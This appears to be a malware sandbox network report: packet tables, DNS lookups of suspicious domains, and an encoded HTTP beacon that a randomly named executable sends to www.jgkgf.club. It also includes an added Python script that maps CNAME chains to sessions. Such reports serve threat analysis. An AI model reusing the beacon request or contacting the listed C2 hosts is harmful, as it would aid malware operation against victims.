                                                                                                                                    Jan 10, 2025 19:47:36.864126921 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.864132881 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.864172935 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.869106054 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.869121075 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.869134903 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.869146109 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.869240046 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.954593897 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.954626083 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.954663992 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.954678059 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.954701900 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.954785109 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.954952002 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.954965115 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.954977036 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.954988956 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.955002069 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.955019951 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.955048084 CET5002080192.168.2.437.97.254.27
                                                                                                                                    Jan 10, 2025 19:47:36.955631971 CET805002037.97.254.27192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:36.955672979 CET5002080192.168.2.437.97.254.27
Jan 10, 2025 19:47:36.955732107 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:36.955744028 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:36.955759048 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:36.955770969 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:36.955785990 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:36.955786943 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:36.955827951 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:36.956588030 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:36.956638098 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:36.956644058 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:36.956665993 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:36.956680059 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:36.956692934 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:36.956711054 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:36.956723928 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:36.956743956 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:36.957593918 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:36.957607985 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:36.957619905 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:36.957662106 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:36.957662106 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:37.045147896 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045171022 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045183897 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045288086 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045308113 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:37.045310020 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045325041 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045339108 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045353889 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045429945 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:37.045855999 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045870066 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045885086 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045907021 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045921087 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045929909 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:37.045933008 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045948029 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045962095 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.045965910 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:37.045985937 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:37.046001911 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:37.046675920 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.046689034 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.046701908 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.046714067 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.046725988 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.046750069 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:37.046761036 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:37.047074080 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:37.047123909 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:37.050270081 CET | 50020 | 80 | 192.168.2.4 | 37.97.254.27
Jan 10, 2025 19:47:37.055093050 CET | 80 | 50020 | 37.97.254.27 | 192.168.2.4
Jan 10, 2025 19:47:42.477189064 CET | 50021 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:42.481939077 CET | 80 | 50021 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:42.482043028 CET | 50021 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:42.496697903 CET | 50021 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:42.501616955 CET | 80 | 50021 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:43.079977989 CET | 80 | 50021 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:43.080105066 CET | 80 | 50021 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:43.080147028 CET | 50021 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:43.999551058 CET | 50021 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:45.058789015 CET | 50022 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:45.063694000 CET | 80 | 50022 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:45.063765049 CET | 50022 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:45.103970051 CET | 50022 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:45.109102011 CET | 80 | 50022 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:45.670983076 CET | 80 | 50022 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:45.671245098 CET | 80 | 50022 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:45.671309948 CET | 50022 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:46.608962059 CET | 50022 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:47.728832960 CET | 50023 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:47.733870029 CET | 80 | 50023 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:47.733990908 CET | 50023 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:47.839987993 CET | 50023 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:47.844897032 CET | 80 | 50023 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:47.844913006 CET | 80 | 50023 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:47.844928980 CET | 80 | 50023 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:47.844954967 CET | 80 | 50023 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:47.844965935 CET | 80 | 50023 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:47.844975948 CET | 80 | 50023 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:47.844986916 CET | 80 | 50023 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:47.845190048 CET | 80 | 50023 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:47.845201015 CET | 80 | 50023 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:48.409528017 CET | 80 | 50023 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:48.409667969 CET | 80 | 50023 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:48.409862041 CET | 50023 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:49.358899117 CET | 50023 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:50.429260015 CET | 50024 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:50.451806068 CET | 80 | 50024 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:50.451894999 CET | 50024 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:50.488270998 CET | 50024 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:50.519124031 CET | 80 | 50024 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:51.047204971 CET | 80 | 50024 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:51.047220945 CET | 80 | 50024 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:47:51.047349930 CET | 50024 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:51.051491022 CET | 50024 | 80 | 192.168.2.4 | 199.193.6.134
Jan 10, 2025 19:47:51.056401968 CET | 80 | 50024 | 199.193.6.134 | 192.168.2.4
Jan 10, 2025 19:48:08.589545012 CET | 50025 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:08.594480038 CET | 80 | 50025 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:08.594544888 CET | 50025 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:08.609489918 CET | 50025 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:08.614407063 CET | 80 | 50025 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:10.124814034 CET | 50025 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:10.129739046 CET | 80 | 50025 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:10.129894972 CET | 50025 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:11.143507004 CET | 50026 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:11.148370028 CET | 80 | 50026 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:11.148477077 CET | 50026 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:11.163376093 CET | 50026 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:11.168170929 CET | 80 | 50026 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:12.671370029 CET | 50026 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:12.676372051 CET | 80 | 50026 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:12.676455021 CET | 50026 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:13.693530083 CET | 50027 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:13.698365927 CET | 80 | 50027 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:13.698479891 CET | 50027 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:13.742569923 CET | 50027 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:13.747499943 CET | 80 | 50027 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:13.747539997 CET | 80 | 50027 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:13.747675896 CET | 80 | 50027 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:13.747684956 CET | 80 | 50027 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:13.747701883 CET | 80 | 50027 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:13.747719049 CET | 80 | 50027 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:13.747816086 CET | 80 | 50027 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:13.747824907 CET | 80 | 50027 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:13.747881889 CET | 80 | 50027 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:15.249597073 CET | 50027 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:15.254545927 CET | 80 | 50027 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:15.254626036 CET | 50027 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:16.268377066 CET | 50028 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:16.273286104 CET | 80 | 50028 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:16.273377895 CET | 50028 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:16.282807112 CET | 50028 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:16.287677050 CET | 80 | 50028 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:18.383856058 CET | 80 | 50028 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:18.384073973 CET | 80 | 50028 | 124.6.61.130 | 192.168.2.4
Jan 10, 2025 19:48:18.386830091 CET | 50028 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:18.386830091 CET | 50028 | 80 | 192.168.2.4 | 124.6.61.130
Jan 10, 2025 19:48:18.391638041 CET | 80 | 50028 | 124.6.61.130 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 19:46:19.718550920 CET | 61068 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 19:46:20.584223032 CET | 53 | 61068 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 19:46:41.238486052 CET | 59297 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 19:46:41.265681028 CET | 53 | 59297 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 19:46:54.409233093 CET | 50799 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 19:46:54.446131945 CET | 53 | 50799 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 19:47:28.519412041 CET | 59242 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 19:47:28.559839964 CET | 53 | 59242 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 19:47:42.066031933 CET | 64747 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 19:47:42.474529982 CET | 53 | 64747 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 19:47:56.065545082 CET | 49587 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 19:47:57.062063932 CET | 49587 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 19:47:58.004179955 CET | 53 | 49587 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 19:47:58.007451057 CET | 53 | 49587 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 19:48:01.048032999 CET | 52699 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 19:48:02.458698034 CET | 52699 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 19:48:03.453915119 CET | 52699 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 19:48:03.535159111 CET | 53 | 52699 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 19:48:03.535175085 CET | 53 | 52699 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 19:48:03.535180092 CET | 53 | 52699 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 19:48:08.551415920 CET | 55447 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 19:48:08.562954903 CET | 53 | 55447 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 19:46:19.718550920 CET | 192.168.2.4 | 1.1.1.1 | 0x95ec | Standard query (0) | www.jgkgf.club | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:46:41.238486052 CET | 192.168.2.4 | 1.1.1.1 | 0x2f43 | Standard query (0) | www.hsa.world | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:46:54.409233093 CET | 192.168.2.4 | 1.1.1.1 | 0x82bb | Standard query (0) | www.sssvip2.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:47:28.519412041 CET | 192.168.2.4 | 1.1.1.1 | 0xaccf | Standard query (0) | www.dutchdubliners.online | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:47:42.066031933 CET | 192.168.2.4 | 1.1.1.1 | 0xbc35 | Standard query (0) | www.allstary.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:47:56.065545082 CET | 192.168.2.4 | 1.1.1.1 | 0x5a5e | Standard query (0) | www.16v9tiu00r.ink | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:47:57.062063932 CET | 192.168.2.4 | 1.1.1.1 | 0x5a5e | Standard query (0) | www.16v9tiu00r.ink | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:48:01.048032999 CET | 192.168.2.4 | 1.1.1.1 | 0x94a8 | Standard query (0) | www.16v9tiu00r.ink | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:48:02.458698034 CET | 192.168.2.4 | 1.1.1.1 | 0x94a8 | Standard query (0) | www.16v9tiu00r.ink | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:48:03.453915119 CET | 192.168.2.4 | 1.1.1.1 | 0x94a8 | Standard query (0) | www.16v9tiu00r.ink | A (IP address) | IN (0x0001) | false
Jan 10, 2025 19:48:08.551415920 CET | 192.168.2.4 | 1.1.1.1 | 0xc832 | Standard query (0) | www.comect.online | A (IP address) | IN (0x0001) | false
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jan 10, 2025 19:46:20.584223032 CET | 1.1.1.1 | 192.168.2.4 | 0x95ec | No error (0) | www.jgkgf.club | ccchhua889911.222tt.icu | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 10, 2025 19:46:20.584223032 CET | 1.1.1.1 | 192.168.2.4 | 0x95ec | No error (0) | ccchhua889911.222tt.icu | | 172.247.112.164 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 19:46:41.265681028 CET | 1.1.1.1 | 192.168.2.4 | 0x2f43 | No error (0) | www.hsa.world | | 13.248.169.48 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 19:46:41.265681028 CET | 1.1.1.1 | 192.168.2.4 | 0x2f43 | No error (0) | www.hsa.world | | 76.223.54.146 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 19:46:54.446131945 CET | 1.1.1.1 | 192.168.2.4 | 0x82bb | No error (0) | www.sssvip2.shop | | 156.253.8.115 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 19:47:28.559839964 CET | 1.1.1.1 | 192.168.2.4 | 0xaccf | No error (0) | www.dutchdubliners.online | dutchdubliners.online | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 10, 2025 19:47:28.559839964 CET | 1.1.1.1 | 192.168.2.4 | 0xaccf | No error (0) | dutchdubliners.online | | 37.97.254.27 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 19:47:42.474529982 CET | 1.1.1.1 | 192.168.2.4 | 0xbc35 | No error (0) | www.allstary.top | | 199.193.6.134 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 19:47:58.004179955 CET | 1.1.1.1 | 192.168.2.4 | 0x5a5e | No error (0) | www.16v9tiu00r.ink | hx2.vip.84dns.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 10, 2025 19:47:58.007451057 CET | 1.1.1.1 | 192.168.2.4 | 0x5a5e | No error (0) | www.16v9tiu00r.ink | hx2.vip.84dns.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 10, 2025 19:48:03.535159111 CET | 1.1.1.1 | 192.168.2.4 | 0x94a8 | No error (0) | www.16v9tiu00r.ink | hx2.vip.84dns.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 10, 2025 19:48:03.535175085 CET | 1.1.1.1 | 192.168.2.4 | 0x94a8 | No error (0) | www.16v9tiu00r.ink | hx2.vip.84dns.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 10, 2025 19:48:03.535180092 CET | 1.1.1.1 | 192.168.2.4 | 0x94a8 | No error (0) | www.16v9tiu00r.ink | hx2.vip.84dns.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 10, 2025 19:48:08.562954903 CET | 1.1.1.1 | 192.168.2.4 | 0xc832 | No error (0) | www.comect.online | | 124.6.61.130 | A (IP address) | IN (0x0001) | false |
• www.jgkgf.club
• www.hsa.world
• www.sssvip2.shop
• www.dutchdubliners.online
• www.allstary.top
• www.comect.online
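The DNS answers above only give one hop each: www.jgkgf.club is answered with a CNAME, and the A record that finally produced the IP belongs to ccchhua889911.222tt.icu, while www.16v9tiu00r.ink gets a CNAME to hx2.vip.84dns.com and no A record in the captured answers. To tie each HTTP session below back to the name the sample actually asked for, the chain has to be followed. The script below is an added example for this report page, not Joe Sandbox code: the answer rows, queried names and session tuples are copied from the tables above and below (constructed input, trimmed to the fields used), and the two-record CNAME loop used to exercise the loop guard is made up.

```python
"""Follow the CNAME chains in the DNS answers above and tie each HTTP session
back to the queried name that produced its destination IP.

Added example for this report page, not Joe Sandbox code.  ANSWERS, QUERIED
and SESSIONS are copied from the report's tables (constructed input, trimmed
to the fields used); any CNAME loop data is made up for testing.
"""
from typing import Dict, List, Set, Tuple

# (name, cname, address, type) from the DNS answers table; "" where the
# report shows an empty column.
ANSWERS: List[Tuple[str, str, str, str]] = [
    ("www.jgkgf.club", "ccchhua889911.222tt.icu", "", "CNAME"),
    ("ccchhua889911.222tt.icu", "", "172.247.112.164", "A"),
    ("www.hsa.world", "", "13.248.169.48", "A"),
    ("www.hsa.world", "", "76.223.54.146", "A"),
    ("www.sssvip2.shop", "", "156.253.8.115", "A"),
    ("www.dutchdubliners.online", "dutchdubliners.online", "", "CNAME"),
    ("dutchdubliners.online", "", "37.97.254.27", "A"),
    ("www.allstary.top", "", "199.193.6.134", "A"),
    ("www.16v9tiu00r.ink", "hx2.vip.84dns.com", "", "CNAME"),
    ("www.comect.online", "", "124.6.61.130", "A"),
]

# Names from the DNS queries table, in first-seen order.
QUERIED = [
    "www.jgkgf.club", "www.hsa.world", "www.sssvip2.shop",
    "www.dutchdubliners.online", "www.allstary.top", "www.16v9tiu00r.ink",
    "www.comect.online",
]

# (session id, destination IP) from the HTTP session headers below.
SESSIONS = [
    (0, "172.247.112.164"), (1, "13.248.169.48"), (2, "13.248.169.48"),
    (3, "13.248.169.48"), (4, "13.248.169.48"), (5, "156.253.8.115"),
    (6, "156.253.8.115"),
]


def index_answers(answers) -> Dict[str, List[Tuple[str, str, str]]]:
    """Group answers by owner name: name -> [(cname, address, type), ...]."""
    idx: Dict[str, List[Tuple[str, str, str]]] = {}
    for name, cname, addr, rtype in answers:
        idx.setdefault(name, []).append((cname, addr, rtype))
    return idx


def resolve(name: str, answers, max_hops: int = 8) -> Set[str]:
    """Return every A address reachable from `name` through CNAME hops.

    A CNAME whose target has no answer in the capture yields nothing.  A
    CNAME loop, or a chain longer than max_hops, is cut off instead of
    recursing forever."""
    idx = index_answers(answers)
    ips: Set[str] = set()
    seen: Set[str] = set()
    frontier = [name]
    for _ in range(max_hops + 1):
        if not frontier:
            break
        nxt: List[str] = []
        for n in frontier:
            if n in seen:
                continue  # loop guard: a name is expanded at most once
            seen.add(n)
            for cname, addr, rtype in idx.get(n, []):
                if rtype == "A" and addr:
                    ips.add(addr)
                elif rtype == "CNAME" and cname:
                    nxt.append(cname)
        frontier = nxt
    return ips


def unresolved(queried, answers) -> List[str]:
    """Queried names whose answers never reach an A record."""
    return [q for q in queried if not resolve(q, answers)]


def sessions_by_name(sessions, queried, answers) -> Dict[int, List[str]]:
    """Map each session id to the queried name(s) that resolved to its destination IP."""
    ip_to_names: Dict[str, List[str]] = {}
    for q in queried:
        for ip in resolve(q, answers):
            ip_to_names.setdefault(ip, []).append(q)
    return {sid: ip_to_names.get(ip, []) for sid, ip in sessions}


if __name__ == "__main__":
    for q in QUERIED:
        print(f"{q:28} -> {sorted(resolve(q, ANSWERS)) or 'no A record in capture'}")
    print("unresolved:", unresolved(QUERIED, ANSWERS))
    print("sessions:", sessions_by_name(SESSIONS, QUERIED, ANSWERS))
```

Run stand-alone it prints one line per queried name; sessions 1 to 4 map to www.hsa.world and sessions 5 and 6 to www.sssvip2.shop, which matches the Host headers in those sessions. The `seen` set matters in practice: passive DNS exports and resolver logs do contain CNAME cycles, and a naive recursive walk on one of them never returns.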
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49843 | 172.247.112.164 | 80 | 5780 | C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe |

Timestamp: Jan 10, 2025 19:46:20.606928110 CET | Bytes transferred: 495 | Direction: OUT
GET /tvkp/?EzZ=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.jgkgf.club
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36

Timestamp: Jan 10, 2025 19:46:21.127095938 CET | Bytes transferred: 524 | Direction: IN
HTTP/1.0 200 OK
Connection: close
Cache-Control: max-age=259200
Content-Type: text/html;charset=utf-8
Content-Length: 395
